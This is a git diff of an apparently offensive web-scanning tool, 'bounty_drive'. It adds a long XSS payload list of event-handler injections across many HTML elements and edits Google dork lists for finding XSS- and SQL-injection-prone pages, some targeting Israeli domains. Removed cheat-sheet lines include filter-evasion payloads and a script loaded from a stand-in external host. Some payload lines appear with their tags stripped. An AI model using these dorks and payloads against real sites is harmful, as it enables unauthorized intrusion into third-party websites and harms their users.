diff --git a/INSTALL.md b/INSTALL.md index 02a1a8a..92e4f6f 100644 --- a/INSTALL.md +++ b/INSTALL.md @@ -1,5 +1,11 @@ # Installation +## Pre-Commit + +python3 -m pip install pre-commit +pre-commit installed at .git/hooks/pre-commit + + ## Classical ## PyPy \ No newline at end of file diff --git a/README.md b/README.md index 1ab5b70..b671d3d 100644 --- a/README.md +++ b/README.md @@ -11,15 +11,15 @@ make ``` ## Usage ```bash -python3 bounty_drive.py +python3 py ``` ```bash -Please specify the website extension(eg- .in,.com,.pk) [default: ] -----> +Please specify the website extension(eg- .in,.com,.pk) [default: ] -----> Do you want to restrict search to subdomain present in target.txt ? [default: true (vs false)] -----> true -Please specify the total no. of websites you want [default: 10] ----> -From which Google page you want to start(eg- 1,2,3) [default: 1] ----> -Do you want to do the Google dorking scan phase ? [default: true (vs false)] ----> +Please specify the total no. of websites you want [default: 10] ----> +From which Google page you want to start(eg- 1,2,3) [default: 1] ----> +Do you want to do the Google dorking scan phase ? [default: true (vs false)] ----> Do you want to do the Github dorking scan phase ? [default: true (vs false)] ----> false Do you want to test for XSS vulnerability ? [default: true (vs false)] ----> true Do you want to encode XSS payload ? [default: true (vs false)] ----> false @@ -40,6 +40,10 @@ Updated at 2024-02-18 15:32:02 UTC. TODO: we should proxy proxy chains +## TODO + +- use singletons for config !!! + # HAPPY HUNTING @@ -64,5 +68,7 @@ https://github.com/spekulatius/infosec-dorks https://github.com/RevoltSecurities/Subdominator +https://github.com/Raghavd3v/CRLFsuite/blob/main/crlfsuite/db/wafsignatures.json + # TODO add a vulnerable wordpress plugin and then dork to find vulnerable wordpress sites \ No newline at end of file diff --git a/bounty_drive/attacks/dorks/dorking_config.py b/bounty_drive/attacks/dorks/dorking_config.py index f001011..310611d 100644 --- a/bounty_drive/attacks/dorks/dorking_config.py +++ b/bounty_drive/attacks/dorks/dorking_config.py @@ -1 +1,6 @@ -SUBDOMAIN = None # TODO use target.txt and allow multiple domain +class DorkingConfig: + SUBDOMAIN = [] # TODO use target.txt and allow multiple domain + CRAWL = False + + +dorking_config = DorkingConfig() diff --git a/bounty_drive/attacks/dorks/google/xss/XSS-Dork.txt b/bounty_drive/attacks/dorks/google/xss/XSS-Dork.txt index 24492fa..28fc5c8 100644 --- a/bounty_drive/attacks/dorks/google/xss/XSS-Dork.txt +++ b/bounty_drive/attacks/dorks/google/xss/XSS-Dork.txt @@ -22,9 +22,9 @@ /view.php?PID= /view.php?PID= /winners.php?year=2008&type= /winners.php?year=2008&type= /winners.php?year=2008&type= /winners.php?year=2008&type= -index.php?option=com_reservations&task=askope&nidser=2&namser= “com_reservations” -index.php?option=com_reservations&task=askope&nidser=2&namser= “com_reservations” -intext:”Website by Mile High Creative” +index.php?option=com_reservations&task=askope&nidser=2&namser= "com_reservations" +index.php?option=com_reservations&task=askope&nidser=2&namser= "com_reservations" +intext:"Website by Mile High Creative" inurl:.com/search.asp inurl:/poll/default.asp?catid= inurl:/products/classified/headersearch.php?sid= @@ -37,28 +37,28 @@ inurl:com_feedpostold/feedpost.php?url= inurl:headersearch.php?sid= inurl:scrapbook.php?id= inurl:search.php?q= -inurl:”.php?author=” -inurl:”.php?cat=” -inurl:”.php?cmd=” -inurl:”.php?feedback=” -inurl:”.php?file=” -inurl:”.php?from=” -inurl:”.php?keyword=” -inurl:”.php?mail=” -inurl:”.php?max=” -inurl:”.php?pass=” -inurl:”.php?q=” -inurl:”.php?query=” -inurl:”.php?search=” -inurl:”.php?searchstring=” -inurl:”.php?searchst­ring=” -inurl:”.php?tag=” -inurl:”.php?txt=” -inurl:”.php?vote=” -inurl:”.php?years=” -inurl:”.php?z=” -inurl:”contentPage.php?id=” -inurl:”displayResource.php?id=” +inurl:".php?author=" +inurl:".php?cat=" +inurl:".php?cmd=" +inurl:".php?feedback=" +inurl:".php?file=" +inurl:".php?from=" +inurl:".php?keyword=" +inurl:".php?mail=" +inurl:".php?max=" +inurl:".php?pass=" +inurl:".php?q=" +inurl:".php?query=" +inurl:".php?search=" +inurl:".php?searchstring=" +inurl:".php?searchst­ring=" +inurl:".php?tag=" +inurl:".php?txt=" +inurl:".php?vote=" +inurl:".php?years=" +inurl:".php?z=" +inurl:"contentPage.php?id=" +inurl:"displayResource.php?id=" pages/match_report.php?mid= pages/match_report.php?mid= inurl:/search?query= inurl:/login?username= diff --git a/bounty_drive/attacks/dorks/google/xss/XSS-HTML-CGPT.txt b/bounty_drive/attacks/dorks/google/xss/XSS-HTML-CGPT.txt new file mode 100644 index 0000000..8cae83f --- /dev/null +++ b/bounty_drive/attacks/dorks/google/xss/XSS-HTML-CGPT.txt @@ -0,0 +1,1359 @@ +

intext:"mysql_numrows()" +site:il

intext:"GetArray()" +site:il

intext:"FetchRow()" +site:il

intext:"Input -string was not in a correct format" +site:il -Using "site:.il" will limit the search to only Israel -domains. -Use SQLi dorks and just add "site:.il" to the -begining of the query, -example below: site:.il inurl:news?id= site:.il inurl:viewshowdetail.php?id= site:.il inurl:clubpage.php?id= @@ -123,7 +117,6 @@ site:.il inurl:tradeCategory.php?id= site:.il inurl:product_ranges_view.php?ID= site:.il inurl:shop_category.php?id= site:.il inurl:transcript.php?id= -Code: inurl:".php?cmd=" inurl:".php?z=" inurl:".php?q=" @@ -148,155 +141,4 @@ inurl:com_feedpostold/feedpost.php?url= inurl:scrapbook.php?id= inurl:headersearch.php?sid= inurl:/poll/default.asp?catid= -inurl:/search_results.php?search= -XSS Cheats -Code: -'';!--"=&{()} -'>//\\,<'>">">"*" -'); alert('XSS - - - - - - -"> - - -ipt>alert('XSS');ipt> -'); ? -> - - - - - -"> - - - - - - - - -
-window.alert("Bonjour !"); -
- onload=alert('X -SS')> -"> -'">>

XSS

- - - - -alert("XSS")'?> - -" onfocus=alert(document.domain) "> <" - -
  • XSS -perl -e 'print \"alert(\"XSS\")\";' > out -perl -e 'print \"\";' > out -
    -alert(1) -
    - -"> -[color=red width=expression(alert(123))][color] - -Execute(MsgBox(chr(88)&chr(83)&chr(83)))< -"> - -'"> -'"> -<<< - - -'> -'>"> - -a="get";b="URL";c="javascript:";d="alert('xss -');";eval(a+b+c+d); -='> -"+src=" http://yoursite.com/xss.js? -69,69 "> -> -">/XaDoS/> -src=" http://www.site.com/XSS.js "> -data:text/html;charset=utf-7;base64,Ij48L -3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTM -zNyk8L3NjcmlwdD4= -!--" /> - -

    XSS by xss

    -">>

    XSS by xss

    -'">

    XSS by xss

    -

    XSS by -xss

    -">">>

    XSS by xss

    - +
    drag me
    +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    +
    drag me
    +
    drag me
    drop here +
    drag me
    drop here +
    drag me
  • drop here
  • +
    drag me
  • drop here
  • +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here
    +
    drag me
    drop here
    +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    +
    drag me
    +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    +
    drag me
    +
    drag me
    drop here +
    drag me
    drop here +
    drag me
      drop here
    +
    drag me
      drop here
    +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    +
    drag me
    +
    drag me
    drop here +
    drag me
    drop here +
    drag me

    drop here

    +
    drag me

    drop here

    +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here</plaintext> +<div draggable="true" contenteditable>drag me</div><plaintext ondrop=alert(1) contenteditable>drop here</plaintext> +<div draggable="true" contenteditable>drag me</div><pre ondragover=alert(1) contenteditable>drop here</pre> +<div draggable="true" contenteditable>drag me</div><pre ondrop=alert(1) contenteditable>drop here</pre> +<div draggable="true" contenteditable>drag me</div><progress ondragover=alert(1) contenteditable>drop here</progress> +<div draggable="true" contenteditable>drag me</div><progress ondrop=alert(1) contenteditable>drop here</progress> +<div draggable="true" contenteditable>drag me</div><q ondragover=alert(1) contenteditable>drop here</q> +<div draggable="true" contenteditable>drag me</div><q ondrop=alert(1) contenteditable>drop here</q> +<div draggable="true" contenteditable>drag me</div><rb ondragover=alert(1) contenteditable>drop here</rb> +<div draggable="true" contenteditable>drag me</div><rb ondrop=alert(1) contenteditable>drop here</rb> +<div draggable="true" contenteditable>drag me</div><rp ondragover=alert(1) contenteditable>drop here</rp> +<div draggable="true" contenteditable>drag me</div><rp ondrop=alert(1) contenteditable>drop here</rp> +<div draggable="true" contenteditable>drag me</div><rt ondragover=alert(1) contenteditable>drop here</rt> +<div draggable="true" contenteditable>drag me</div><rt ondrop=alert(1) contenteditable>drop here</rt> +<div draggable="true" contenteditable>drag me</div><rtc ondragover=alert(1) contenteditable>drop here</rtc> +<div draggable="true" contenteditable>drag me</div><rtc ondrop=alert(1) contenteditable>drop here</rtc> +<div draggable="true" contenteditable>drag me</div><ruby ondragover=alert(1) contenteditable>drop here</ruby> +<div draggable="true" contenteditable>drag me</div><ruby ondrop=alert(1) contenteditable>drop here</ruby> +<div draggable="true" contenteditable>drag me</div><s ondragover=alert(1) contenteditable>drop here</s> +<div draggable="true" contenteditable>drag me</div><s ondrop=alert(1) contenteditable>drop here</s> +<div draggable="true" contenteditable>drag me</div><samp ondragover=alert(1) contenteditable>drop here</samp> +<div draggable="true" contenteditable>drag me</div><samp ondrop=alert(1) contenteditable>drop here</samp> +<div draggable="true" contenteditable>drag me</div><script ondragover=alert(1) contenteditable>drop here</script> +<div draggable="true" contenteditable>drag me</div><script ondrop=alert(1) contenteditable>drop here</script> +<div draggable="true" contenteditable>drag me</div><section ondragover=alert(1) contenteditable>drop here</section> +<div draggable="true" contenteditable>drag me</div><section ondrop=alert(1) contenteditable>drop here</section> +<div draggable="true" contenteditable>drag me</div><select ondragover=alert(1) contenteditable>drop here</select> +<div draggable="true" contenteditable>drag me</div><select ondrop=alert(1) contenteditable>drop here</select> +<div draggable="true" contenteditable>drag me</div><shadow ondragover=alert(1) contenteditable>drop here</shadow> +<div draggable="true" contenteditable>drag me</div><shadow ondrop=alert(1) contenteditable>drop here</shadow> +<div draggable="true" contenteditable>drag me</div><slot ondragover=alert(1) contenteditable>drop here</slot> +<div draggable="true" contenteditable>drag me</div><slot ondrop=alert(1) contenteditable>drop here</slot> +<div draggable="true" contenteditable>drag me</div><small ondragover=alert(1) contenteditable>drop here</small> +<div draggable="true" contenteditable>drag me</div><small ondrop=alert(1) contenteditable>drop here</small> +<div draggable="true" contenteditable>drag me</div><source ondragover=alert(1) contenteditable>drop here</source> +<div draggable="true" contenteditable>drag me</div><source ondrop=alert(1) contenteditable>drop here</source> +<div draggable="true" contenteditable>drag me</div><spacer ondragover=alert(1) contenteditable>drop here</spacer> +<div draggable="true" contenteditable>drag me</div><spacer ondrop=alert(1) contenteditable>drop here</spacer> +<div draggable="true" contenteditable>drag me</div><span ondragover=alert(1) contenteditable>drop here</span> +<div draggable="true" contenteditable>drag me</div><span ondrop=alert(1) contenteditable>drop here</span> +<div draggable="true" contenteditable>drag me</div><strike ondragover=alert(1) contenteditable>drop here</strike> +<div draggable="true" contenteditable>drag me</div><strike ondrop=alert(1) contenteditable>drop here</strike> +<div draggable="true" contenteditable>drag me</div><strong ondragover=alert(1) contenteditable>drop here</strong> +<div draggable="true" contenteditable>drag me</div><strong ondrop=alert(1) contenteditable>drop here</strong> +<div draggable="true" contenteditable>drag me</div><style ondragover=alert(1) contenteditable>drop here</style> +<div draggable="true" contenteditable>drag me</div><style ondrop=alert(1) contenteditable>drop here</style> +<div draggable="true" contenteditable>drag me</div><sub ondragover=alert(1) contenteditable>drop here</sub> +<div draggable="true" contenteditable>drag me</div><sub ondrop=alert(1) contenteditable>drop here</sub> +<div draggable="true" contenteditable>drag me</div><summary ondragover=alert(1) contenteditable>drop here</summary> +<div draggable="true" contenteditable>drag me</div><summary ondrop=alert(1) contenteditable>drop here</summary> +<div draggable="true" contenteditable>drag me</div><sup ondragover=alert(1) contenteditable>drop here</sup> +<div draggable="true" contenteditable>drag me</div><sup ondrop=alert(1) contenteditable>drop here</sup> +<div draggable="true" contenteditable>drag me</div><svg ondragover=alert(1) contenteditable>drop here</svg> +<div draggable="true" contenteditable>drag me</div><svg ondrop=alert(1) contenteditable>drop here</svg> +<div draggable="true" contenteditable>drag me</div><table ondragover=alert(1) contenteditable>drop here</table> +<div draggable="true" contenteditable>drag me</div><table ondrop=alert(1) contenteditable>drop here</table> +<div draggable="true" contenteditable>drag me</div><tbody ondragover=alert(1) contenteditable>drop here</tbody> +<div draggable="true" contenteditable>drag me</div><tbody ondrop=alert(1) contenteditable>drop here</tbody> +<div draggable="true" contenteditable>drag me</div><td ondragover=alert(1) contenteditable>drop here</td> +<div draggable="true" contenteditable>drag me</div><td ondrop=alert(1) contenteditable>drop here</td> +<div draggable="true" contenteditable>drag me</div><template ondragover=alert(1) contenteditable>drop here</template> +<div draggable="true" contenteditable>drag me</div><template ondrop=alert(1) contenteditable>drop here</template> +<div draggable="true" contenteditable>drag me</div><textarea ondragover=alert(1) contenteditable>drop here</textarea> +<div draggable="true" contenteditable>drag me</div><textarea ondrop=alert(1) contenteditable>drop here</textarea> +<div draggable="true" contenteditable>drag me</div><tfoot ondragover=alert(1) contenteditable>drop here</tfoot> +<div draggable="true" contenteditable>drag me</div><tfoot ondrop=alert(1) contenteditable>drop here</tfoot> +<div draggable="true" contenteditable>drag me</div><th ondragover=alert(1) contenteditable>drop here</th> +<div draggable="true" contenteditable>drag me</div><th ondrop=alert(1) contenteditable>drop here</th> +<div draggable="true" contenteditable>drag me</div><thead ondragover=alert(1) contenteditable>drop here</thead> +<div draggable="true" contenteditable>drag me</div><thead ondrop=alert(1) contenteditable>drop here</thead> +<div draggable="true" contenteditable>drag me</div><time ondragover=alert(1) contenteditable>drop here</time> +<div draggable="true" contenteditable>drag me</div><time ondrop=alert(1) contenteditable>drop here</time> +<div draggable="true" contenteditable>drag me</div><title ondragover=alert(1) contenteditable>drop here</title> +<div draggable="true" contenteditable>drag me</div><title ondrop=alert(1) contenteditable>drop here</title> +<div draggable="true" contenteditable>drag me</div><tr ondragover=alert(1) contenteditable>drop here</tr> +<div draggable="true" contenteditable>drag me</div><tr ondrop=alert(1) contenteditable>drop here</tr> +<div draggable="true" contenteditable>drag me</div><track ondragover=alert(1) contenteditable>drop here</track> +<div draggable="true" contenteditable>drag me</div><track ondrop=alert(1) contenteditable>drop here</track> +<div draggable="true" contenteditable>drag me</div><tt ondragover=alert(1) contenteditable>drop here</tt> +<div draggable="true" contenteditable>drag me</div><tt ondrop=alert(1) contenteditable>drop here</tt> +<div draggable="true" contenteditable>drag me</div><u ondragover=alert(1) contenteditable>drop here</u> +<div draggable="true" contenteditable>drag me</div><u ondrop=alert(1) contenteditable>drop here</u> +<div draggable="true" contenteditable>drag me</div><ul ondragover=alert(1) contenteditable>drop here</ul> +<div draggable="true" contenteditable>drag me</div><ul ondrop=alert(1) contenteditable>drop here</ul> +<div draggable="true" contenteditable>drag me</div><var ondragover=alert(1) contenteditable>drop here</var> +<div draggable="true" contenteditable>drag me</div><var ondrop=alert(1) contenteditable>drop here</var> +<div draggable="true" contenteditable>drag me</div><video ondragover=alert(1) contenteditable>drop here</video> +<div draggable="true" contenteditable>drag me</div><video ondrop=alert(1) contenteditable>drop here</video> +<div draggable="true" contenteditable>drag me</div><wbr ondragover=alert(1) contenteditable>drop here</wbr> +<div draggable="true" contenteditable>drag me</div><wbr ondrop=alert(1) contenteditable>drop here</wbr> +<div draggable="true" contenteditable>drag me</div><xmp ondragover=alert(1) contenteditable>drop here</xmp> +<div draggable="true" contenteditable>drag me</div><xmp ondrop=alert(1) contenteditable>drop here</xmp> +<div draggable="true" ondrag="alert(1)">test</div> +<div draggable="true" ondragend="alert(1)">test</div> +<div draggable="true" ondragenter="alert(1)">test</div> +<div draggable="true" ondragleave="alert(1)">test</div> +<div draggable="true" ondragstart="alert(1)">test</div> +<div id=x tabindex=1 onactivate=alert(1)></div> +<div id=x tabindex=1 onbeforeactivate=alert(1)></div> +<div id=x tabindex=1 onbeforedeactivate=alert(1)></div><input autofocus> +<div id=x tabindex=1 ondeactivate=alert(1)></div><input id=y autofocus> +<div id=x tabindex=1 onfocus=alert(1)></div> +<div id=x tabindex=1 onfocusin=alert(1)></div> +<div onbeforecopy="alert(1)" contenteditable>test</div> +<div onbeforecut="alert(1)" contenteditable>test</div> +<div onbeforepaste="alert(1)" contenteditable>test</div> +<div onblur=alert(1) tabindex=1 id=x></div><input autofocus> +<div onclick="alert(1)">test</div> +<div oncontextmenu="alert(1)">test</div> +<div oncopy="alert(1)" contenteditable>test</div> +<div oncut="alert(1)" contenteditable>test</div> +<div ondblclick="alert(1)">test</div> +<div onfocusout=alert(1) tabindex=1 id=x></div><input autofocus> +<div onkeydown="alert(1)" contenteditable>test</div> +<div onkeypress="alert(1)" contenteditable>test</div> +<div onkeyup="alert(1)" contenteditable>test</div> +<div onmousedown="alert(1)">test</div> +<div onmouseenter="alert(1)">test</div> +<div onmouseleave="alert(1)">test</div> +<div onmousemove="alert(1)">test</div> +<div onmouseout="alert(1)">test</div> +<div onmouseover="alert(1)">test</div> +<div onmouseup="alert(1)">test</div> +<div onpaste="alert(1)" contenteditable>test</div> +<dl draggable="true" ondrag="alert(1)">test</dl> +<dl draggable="true" ondragend="alert(1)">test</dl> +<dl draggable="true" ondragenter="alert(1)">test</dl> +<dl draggable="true" ondragleave="alert(1)">test</dl> +<dl draggable="true" ondragstart="alert(1)">test</dl> +<dl id=x tabindex=1 onactivate=alert(1)></dl> +<dl id=x tabindex=1 onbeforeactivate=alert(1)></dl> +<dl id=x tabindex=1 onbeforedeactivate=alert(1)></dl><input autofocus> +<dl id=x tabindex=1 ondeactivate=alert(1)></dl><input id=y autofocus> +<dl id=x tabindex=1 onfocus=alert(1)></dl> +<dl id=x tabindex=1 onfocusin=alert(1)></dl> +<dl onbeforecopy="alert(1)" contenteditable>test</dl> +<dl onbeforecut="alert(1)" contenteditable>test</dl> +<dl onbeforepaste="alert(1)" contenteditable>test</dl> +<dl onblur=alert(1) tabindex=1 id=x></dl><input autofocus> +<dl onclick="alert(1)">test</dl> +<dl oncontextmenu="alert(1)">test</dl> +<dl oncopy="alert(1)" contenteditable>test</dl> +<dl oncut="alert(1)" contenteditable>test</dl> +<dl ondblclick="alert(1)">test</dl> +<dl onfocusout=alert(1) tabindex=1 id=x></dl><input autofocus> +<dl onkeydown="alert(1)" contenteditable>test</dl> +<dl onkeypress="alert(1)" contenteditable>test</dl> +<dl onkeyup="alert(1)" contenteditable>test</dl> +<dl onmousedown="alert(1)">test</dl> +<dl onmouseenter="alert(1)">test</dl> +<dl onmouseleave="alert(1)">test</dl> +<dl onmousemove="alert(1)">test</dl> +<dl onmouseout="alert(1)">test</dl> +<dl onmouseover="alert(1)">test</dl> +<dl onmouseup="alert(1)">test</dl> +<dl onpaste="alert(1)" contenteditable>test</dl> +<dt draggable="true" ondrag="alert(1)">test</dt> +<dt draggable="true" ondragend="alert(1)">test</dt> +<dt draggable="true" ondragenter="alert(1)">test</dt> +<dt draggable="true" ondragleave="alert(1)">test</dt> +<dt draggable="true" ondragstart="alert(1)">test</dt> +<dt id=x tabindex=1 onactivate=alert(1)></dt> +<dt id=x tabindex=1 onbeforeactivate=alert(1)></dt> +<dt id=x tabindex=1 onbeforedeactivate=alert(1)></dt><input autofocus> +<dt id=x tabindex=1 ondeactivate=alert(1)></dt><input id=y autofocus> +<dt id=x tabindex=1 onfocus=alert(1)></dt> +<dt id=x tabindex=1 onfocusin=alert(1)></dt> +<dt onbeforecopy="alert(1)" contenteditable>test</dt> +<dt onbeforecut="alert(1)" contenteditable>test</dt> +<dt onbeforepaste="alert(1)" contenteditable>test</dt> +<dt onblur=alert(1) tabindex=1 id=x></dt><input autofocus> +<dt onclick="alert(1)">test</dt> +<dt oncontextmenu="alert(1)">test</dt> +<dt oncopy="alert(1)" contenteditable>test</dt> +<dt oncut="alert(1)" contenteditable>test</dt> +<dt ondblclick="alert(1)">test</dt> +<dt onfocusout=alert(1) tabindex=1 id=x></dt><input autofocus> +<dt onkeydown="alert(1)" contenteditable>test</dt> +<dt onkeypress="alert(1)" contenteditable>test</dt> +<dt onkeyup="alert(1)" contenteditable>test</dt> +<dt onmousedown="alert(1)">test</dt> +<dt onmouseenter="alert(1)">test</dt> +<dt onmouseleave="alert(1)">test</dt> +<dt onmousemove="alert(1)">test</dt> +<dt onmouseout="alert(1)">test</dt> +<dt onmouseover="alert(1)">test</dt> +<dt onmouseup="alert(1)">test</dt> +<dt onpaste="alert(1)" contenteditable>test</dt> +<element draggable="true" ondrag="alert(1)">test</element> +<element draggable="true" ondragend="alert(1)">test</element> +<element draggable="true" ondragenter="alert(1)">test</element> +<element draggable="true" ondragleave="alert(1)">test</element> +<element draggable="true" ondragstart="alert(1)">test</element> +<element id=x tabindex=1 onactivate=alert(1)></element> +<element id=x tabindex=1 onbeforeactivate=alert(1)></element> +<element id=x tabindex=1 onbeforedeactivate=alert(1)></element><input autofocus> +<element id=x tabindex=1 ondeactivate=alert(1)></element><input id=y autofocus> +<element id=x tabindex=1 onfocus=alert(1)></element> +<element id=x tabindex=1 onfocusin=alert(1)></element> +<element onbeforecopy="alert(1)" contenteditable>test</element> +<element onbeforecut="alert(1)" contenteditable>test</element> +<element onbeforepaste="alert(1)" contenteditable>test</element> +<element onblur=alert(1) tabindex=1 id=x></element><input autofocus> +<element onclick="alert(1)">test</element> +<element oncontextmenu="alert(1)">test</element> +<element oncopy="alert(1)" contenteditable>test</element> +<element oncut="alert(1)" contenteditable>test</element> +<element ondblclick="alert(1)">test</element> +<element onfocusout=alert(1) tabindex=1 id=x></element><input autofocus> +<element onkeydown="alert(1)" contenteditable>test</element> +<element onkeypress="alert(1)" contenteditable>test</element> +<element onkeyup="alert(1)" contenteditable>test</element> +<element onmousedown="alert(1)">test</element> +<element onmouseenter="alert(1)">test</element> +<element onmouseleave="alert(1)">test</element> +<element onmousemove="alert(1)">test</element> +<element onmouseout="alert(1)">test</element> +<element onmouseover="alert(1)">test</element> +<element onmouseup="alert(1)">test</element> +<element onpaste="alert(1)" contenteditable>test</element> +<em draggable="true" ondrag="alert(1)">test</em> +<em draggable="true" ondragend="alert(1)">test</em> +<em draggable="true" ondragenter="alert(1)">test</em> +<em draggable="true" ondragleave="alert(1)">test</em> +<em draggable="true" ondragstart="alert(1)">test</em> +<em id=x tabindex=1 onactivate=alert(1)></em> +<em id=x tabindex=1 onbeforeactivate=alert(1)></em> +<em id=x tabindex=1 onbeforedeactivate=alert(1)></em><input autofocus> +<em id=x tabindex=1 ondeactivate=alert(1)></em><input id=y autofocus> +<em id=x tabindex=1 onfocus=alert(1)></em> +<em id=x tabindex=1 onfocusin=alert(1)></em> +<em onbeforecopy="alert(1)" contenteditable>test</em> +<em onbeforecut="alert(1)" contenteditable>test</em> +<em onbeforepaste="alert(1)" contenteditable>test</em> +<em onblur=alert(1) tabindex=1 id=x></em><input autofocus> +<em onclick="alert(1)">test</em> +<em oncontextmenu="alert(1)">test</em> +<em oncopy="alert(1)" contenteditable>test</em> +<em oncut="alert(1)" contenteditable>test</em> +<em ondblclick="alert(1)">test</em> +<em onfocusout=alert(1) tabindex=1 id=x></em><input autofocus> +<em onkeydown="alert(1)" contenteditable>test</em> +<em onkeypress="alert(1)" contenteditable>test</em> +<em onkeyup="alert(1)" contenteditable>test</em> +<em onmousedown="alert(1)">test</em> +<em onmouseenter="alert(1)">test</em> +<em onmouseleave="alert(1)">test</em> +<em onmousemove="alert(1)">test</em> +<em onmouseout="alert(1)">test</em> +<em onmouseover="alert(1)">test</em> +<em onmouseup="alert(1)">test</em> +<em onpaste="alert(1)" contenteditable>test</em> +<embed draggable="true" ondrag="alert(1)">test</embed> +<embed draggable="true" ondragend="alert(1)">test</embed> +<embed draggable="true" ondragenter="alert(1)">test</embed> +<embed draggable="true" ondragleave="alert(1)">test</embed> +<embed draggable="true" ondragstart="alert(1)">test</embed> +<embed id=x onfocus=alert(1) type=text/html> +<embed id=x onfocusin=alert(1) type=text/html> +<embed id=x tabindex=1 onactivate=alert(1)></embed> +<embed id=x tabindex=1 onbeforeactivate=alert(1)></embed> +<embed id=x tabindex=1 onbeforedeactivate=alert(1)></embed><input autofocus> +<embed id=x tabindex=1 ondeactivate=alert(1)></embed><input id=y autofocus> +<embed onbeforecopy="alert(1)" contenteditable>test</embed> +<embed onbeforecut="alert(1)" contenteditable>test</embed> +<embed onbeforepaste="alert(1)" contenteditable>test</embed> +<embed onblur=alert(1) tabindex=1 id=x></embed><input autofocus> +<embed onclick="alert(1)">test</embed> +<embed oncontextmenu="alert(1)">test</embed> +<embed oncopy="alert(1)" contenteditable>test</embed> +<embed oncut="alert(1)" contenteditable>test</embed> +<embed ondblclick="alert(1)">test</embed> +<embed onfocusout=alert(1) tabindex=1 id=x></embed><input autofocus> +<embed onkeydown="alert(1)" contenteditable>test</embed> +<embed onkeypress="alert(1)" contenteditable>test</embed> +<embed onkeyup="alert(1)" contenteditable>test</embed> +<embed onmousedown="alert(1)">test</embed> +<embed onmouseenter="alert(1)">test</embed> +<embed onmouseleave="alert(1)">test</embed> +<embed onmousemove="alert(1)">test</embed> +<embed onmouseout="alert(1)">test</embed> +<embed onmouseover="alert(1)">test</embed> +<embed onmouseup="alert(1)">test</embed> +<embed onpaste="alert(1)" contenteditable>test</embed> +<embed src=/ onload=alert(1)> +<embed src=1 onerror=alert(1) type=image/gif> +<fieldset draggable="true" ondrag="alert(1)">test</fieldset> +<fieldset draggable="true" ondragend="alert(1)">test</fieldset> +<fieldset draggable="true" ondragenter="alert(1)">test</fieldset> +<fieldset draggable="true" ondragleave="alert(1)">test</fieldset> +<fieldset draggable="true" ondragstart="alert(1)">test</fieldset> +<fieldset id=x tabindex=1 onactivate=alert(1)></fieldset> +<fieldset id=x tabindex=1 onbeforeactivate=alert(1)></fieldset> +<fieldset id=x tabindex=1 onbeforedeactivate=alert(1)></fieldset><input autofocus> +<fieldset id=x tabindex=1 ondeactivate=alert(1)></fieldset><input id=y autofocus> +<fieldset id=x tabindex=1 onfocus=alert(1)></fieldset> +<fieldset id=x tabindex=1 onfocusin=alert(1)></fieldset> +<fieldset onbeforecopy="alert(1)" contenteditable>test</fieldset> +<fieldset onbeforecut="alert(1)" contenteditable>test</fieldset> +<fieldset onbeforepaste="alert(1)" contenteditable>test</fieldset> +<fieldset onblur=alert(1) tabindex=1 id=x></fieldset><input autofocus> +<fieldset onclick="alert(1)">test</fieldset> +<fieldset oncontextmenu="alert(1)">test</fieldset> +<fieldset oncopy="alert(1)" contenteditable>test</fieldset> +<fieldset oncut="alert(1)" contenteditable>test</fieldset> +<fieldset ondblclick="alert(1)">test</fieldset> +<fieldset onfocusout=alert(1) tabindex=1 id=x></fieldset><input autofocus> +<fieldset onkeydown="alert(1)" contenteditable>test</fieldset> +<fieldset onkeypress="alert(1)" contenteditable>test</fieldset> +<fieldset onkeyup="alert(1)" contenteditable>test</fieldset> +<fieldset onmousedown="alert(1)">test</fieldset> +<fieldset onmouseenter="alert(1)">test</fieldset> +<fieldset onmouseleave="alert(1)">test</fieldset> +<fieldset onmousemove="alert(1)">test</fieldset> +<fieldset onmouseout="alert(1)">test</fieldset> +<fieldset onmouseover="alert(1)">test</fieldset> +<fieldset onmouseup="alert(1)">test</fieldset> +<fieldset onpaste="alert(1)" contenteditable>test</fieldset> +<figcaption draggable="true" ondrag="alert(1)">test</figcaption> +<figcaption draggable="true" ondragend="alert(1)">test</figcaption> +<figcaption draggable="true" ondragenter="alert(1)">test</figcaption> +<figcaption draggable="true" ondragleave="alert(1)">test</figcaption> +<figcaption draggable="true" ondragstart="alert(1)">test</figcaption> +<figcaption id=x tabindex=1 onactivate=alert(1)></figcaption> +<figcaption id=x tabindex=1 onbeforeactivate=alert(1)></figcaption> +<figcaption id=x tabindex=1 onbeforedeactivate=alert(1)></figcaption><input autofocus> +<figcaption id=x tabindex=1 ondeactivate=alert(1)></figcaption><input id=y autofocus> +<figcaption id=x tabindex=1 onfocus=alert(1)></figcaption> +<figcaption id=x tabindex=1 onfocusin=alert(1)></figcaption> +<figcaption onbeforecopy="alert(1)" contenteditable>test</figcaption> +<figcaption onbeforecut="alert(1)" contenteditable>test</figcaption> +<figcaption onbeforepaste="alert(1)" contenteditable>test</figcaption> +<figcaption onblur=alert(1) tabindex=1 id=x></figcaption><input autofocus> +<figcaption onclick="alert(1)">test</figcaption> +<figcaption oncontextmenu="alert(1)">test</figcaption> +<figcaption oncopy="alert(1)" contenteditable>test</figcaption> +<figcaption oncut="alert(1)" contenteditable>test</figcaption> +<figcaption ondblclick="alert(1)">test</figcaption> +<figcaption onfocusout=alert(1) tabindex=1 id=x></figcaption><input autofocus> +<figcaption onkeydown="alert(1)" contenteditable>test</figcaption> +<figcaption onkeypress="alert(1)" contenteditable>test</figcaption> +<figcaption onkeyup="alert(1)" contenteditable>test</figcaption> +<figcaption onmousedown="alert(1)">test</figcaption> +<figcaption 